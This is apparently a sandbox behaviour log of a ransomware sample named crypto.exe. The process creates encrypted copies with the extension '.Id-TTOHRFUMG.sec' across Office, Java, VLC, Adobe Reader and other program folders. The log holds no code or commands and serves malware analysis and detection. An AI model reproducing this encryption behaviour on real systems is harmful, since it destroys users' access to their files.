File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105234.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287024.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADVTEL.DIC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlcese35.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGM.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mexico_City.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-api.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\grayStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02746G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00232_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Sts.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libscte18_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00296_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Noronha.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00011_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libbluescreen_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_bkg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pe.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Mendoza.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287417.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115835.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\attention.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\VideoLAN Website.url.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216588.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00296_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105526.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341561.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Author2String.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\ACTIVITS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\XLCPRTID.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libt140_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\javafx-iio.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONENOTE.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Casual.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\npvlc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\activity16v.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0205462.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0233018.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSTORE_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Journal\Templates\Genko_2.jtp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Toronto.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ENVELOPE.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143745.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21306_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00531_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Athens.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00452_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONFILTER.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB5B.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MLCFG32.CPL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libsharpen_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\1033\CAGCAT10.MML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSTINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OIS.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libedummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195788.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21399_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\en-US\WMM2CLIP.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107262.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTIT.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200467.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10298_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02388_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\net.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00641_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15073_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_udp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libgaussianblur_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-compat.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107282.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_lt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\button_left.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SOCIALPROVIDER.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_right.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00346_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143746.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\ACCVDTUI.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_bullets.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PICSTYLES.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Office Word 2003 Look.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\pingsender.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01167_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198234.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01354_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ar.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\NAME.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GRAPH_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javafx-font.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00320_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099183.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport_mask_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Guatemala.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200279.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0212219.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_widescreen_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Amman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB9.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\et.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR33B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\removed-files.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\dt_shmem.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\XLINTL32.REST.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-disable.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0216724.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART4.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\mux\libmux_mpjpeg_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ru.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Chihuahua.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Efate.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0196060.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01491_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmprph.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21308_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\j2pcsc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00957_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107480.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02208U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21527_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_pressed.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\CLICK.WAV.Id-TTOHRFUMG.sec	crypto.exe
